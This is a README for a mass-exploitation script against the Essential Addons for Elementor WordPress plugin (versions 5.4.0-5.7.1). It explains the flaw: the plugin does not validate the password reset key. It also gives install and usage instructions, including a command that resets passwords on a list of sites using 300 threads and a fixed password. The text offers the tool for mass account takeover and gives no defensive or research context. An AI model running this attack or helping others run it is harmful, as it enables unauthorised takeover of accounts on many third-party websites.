Essential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalation ( MASS VERSION FASTED ) + Auto User Finder
The plugin does not validate the password reset key, which could allow unauthenticated attackers to reset arbitrary account's password to anything they want, by knowing the related email or username, gaining access to them
pip install -r requirements.txt
usage: exploit.py -l [list] -p [Password] -t [Thread]
options:
-l list list of the WordPress site
-p PASSWORD
Password to set for the selected username
-t Threads
python3 exploit.py -l list.txt -p M@rAzAli -t 300